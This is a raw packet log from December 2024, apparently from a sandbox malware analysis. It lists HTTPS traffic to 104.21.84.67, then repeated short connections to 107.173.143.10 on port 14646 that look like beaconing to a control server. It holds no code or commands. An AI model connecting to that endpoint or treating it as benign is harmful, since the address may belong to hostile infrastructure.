Dec 13, 2024 07:38:53.629570007 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.629607916 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.640274048 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.640352964 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.640356064 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.640377045 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.640429020 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.648487091 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.697727919 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.697797060 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.744690895 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.748594046 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.791589975 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.791672945 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.820904970 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.821011066 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.821083069 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.824477911 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.824552059 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.824570894 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.834863901 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.834930897 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.834948063 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.842427015 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.842513084 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.842529058 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.857573032 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.857666016 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.857677937 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.857697964 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.857767105 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.865097046 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.872546911 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.872627020 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.872649908 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.880059004 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.880130053 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.880147934 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.887593031 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.887665987 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.887681961 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.894669056 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.894746065 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.894761086 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.901688099 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.901774883 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.901789904 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.908601046 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.908694983 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:53.908710957 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:53.963294983 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.013138056 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.015547037 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.015625000 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.015687943 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.020420074 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.020493031 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.020513058 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.029984951 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.030077934 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.030092955 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.030162096 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.034674883 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.034696102 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.034756899 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.043380022 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.043456078 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.043472052 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.043534994 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.051815987 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.051839113 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.051888943 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.060430050 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.060499907 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.060518026 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.060580015 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.064331055 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.064421892 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.068412066 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.068484068 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.072721004 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.072803020 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.081159115 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.081239939 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.089385986 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.089473009 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.097768068 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.097851992 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.101990938 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.102087975 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.110661030 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.110743046 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.118551970 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.118626118 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.205135107 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.205238104 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.210160017 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.210244894 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.216886044 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.216963053 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.223403931 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.223469019 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.226553917 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.226624966 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.232584000 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.232646942 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.238234997 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.238296032 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.243856907 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.243917942 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.246958017 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.247025967 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.252167940 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.252237082 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.255007982 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.255095959 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.260535002 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.260613918 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.265866995 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.265947104 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.271342039 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.271424055 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.274180889 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.274264097 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.279694080 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.279782057 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.282516956 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.282596111 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.287921906 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.288007021 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.293243885 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.293342113 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.298818111 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.298907995 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.301613092 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.301692009 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.307109118 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.307193041 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.312832117 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.312922001 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.315291882 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.315376043 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.397147894 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.397277117 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.400144100 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.400260925 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.414534092 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.414552927 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.414576054 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.414644957 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.414679050 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.414720058 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.414763927 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.424122095 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.424182892 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.424235106 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.424252033 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.424288034 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.435143948 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.435213089 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.435249090 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.435266018 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.435307026 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.447045088 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.447078943 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.447154045 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.447170973 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.447202921 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.458319902 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.458343983 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.458396912 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.458414078 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.458462000 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.469943047 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.469964981 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.470038891 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.470066071 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.470097065 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.481805086 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.481827974 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.481895924 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.481913090 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.481965065 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.525794983 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.592472076 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.592555046 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.592658043 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.592679024 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.592713118 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.592740059 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.601336956 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.601401091 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.601454973 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.601473093 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.601500988 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.603939056 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.608623981 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.608689070 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.608728886 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.608756065 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.608789921 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.609447002 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.616821051 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.616898060 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.616986036 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.617012024 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.617048025 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.617080927 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.624773026 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.624819994 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.624913931 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.624933004 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.624979973 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.625015020 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.632266045 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.632308960 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.632343054 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.632354021 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.632386923 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.632407904 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.640369892 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.640417099 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.640454054 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.640461922 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.640496016 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.640518904 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.647408962 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.647452116 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.647512913 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.647521019 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.647572994 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.783974886 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.784009933 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.784096956 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.784173012 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.784212112 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.784243107 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.791410923 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.791445017 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.791501999 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.791532993 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.791573048 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.791598082 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.798012972 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.798051119 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.798149109 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.798180103 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.798208952 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.798326969 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.806056976 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.806090117 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.806164026 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.806205988 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.806241989 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.806328058 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.812930107 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.812963963 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.813069105 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.813086987 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.813386917 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.820014954 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.820044041 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.820102930 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.820123911 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.820163965 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.820408106 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.827543020 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.827575922 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.827691078 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.827735901 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.827819109 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.834222078 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.834252119 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.834347010 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.834364891 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.835977077 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.976027012 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.976042986 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.976161003 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.976238966 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.976350069 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.983449936 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.983484030 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.983541965 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.983560085 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.983608961 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.983633995 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.990879059 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.990909100 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.990977049 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.990993023 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.991130114 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.997437954 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.997467041 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.997541904 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.997555971 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.997673988 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.999475002 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.999552965 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:54.999579906 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.999607086 CET	443	49771	104.21.84.67	192.168.2.6
Dec 13, 2024 07:38:54.999671936 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:55.000092983 CET	49771	443	192.168.2.6	104.21.84.67
Dec 13, 2024 07:38:55.414653063 CET	49778	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:38:55.534579039 CET	14646	49778	107.173.143.10	192.168.2.6
Dec 13, 2024 07:38:55.537488937 CET	49778	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:38:55.544075966 CET	49778	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:38:55.664123058 CET	14646	49778	107.173.143.10	192.168.2.6
Dec 13, 2024 07:38:57.484607935 CET	14646	49778	107.173.143.10	192.168.2.6
Dec 13, 2024 07:38:57.484694958 CET	49778	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:38:57.484786987 CET	49778	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:38:57.604604006 CET	14646	49778	107.173.143.10	192.168.2.6
Dec 13, 2024 07:38:58.496583939 CET	49788	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:38:58.616339922 CET	14646	49788	107.173.143.10	192.168.2.6
Dec 13, 2024 07:38:58.616461039 CET	49788	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:38:58.620697021 CET	49788	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:38:58.740463972 CET	14646	49788	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:00.557826042 CET	14646	49788	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:00.557990074 CET	49788	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:00.557990074 CET	49788	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:00.677876949 CET	14646	49788	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:01.574445009 CET	49794	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:01.694381952 CET	14646	49794	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:01.694478989 CET	49794	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:01.700632095 CET	49794	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:01.820342064 CET	14646	49794	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:03.634984970 CET	14646	49794	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:03.635149956 CET	49794	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:03.635149956 CET	49794	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:03.754936934 CET	14646	49794	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:04.652729034 CET	49801	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:04.772552013 CET	14646	49801	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:04.772650003 CET	49801	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:04.776256084 CET	49801	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:04.895942926 CET	14646	49801	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:06.714364052 CET	14646	49801	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:06.714457035 CET	49801	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:06.714546919 CET	49801	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:06.835269928 CET	14646	49801	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:07.730220079 CET	49810	14646	192.168.2.6	107.173.143.10
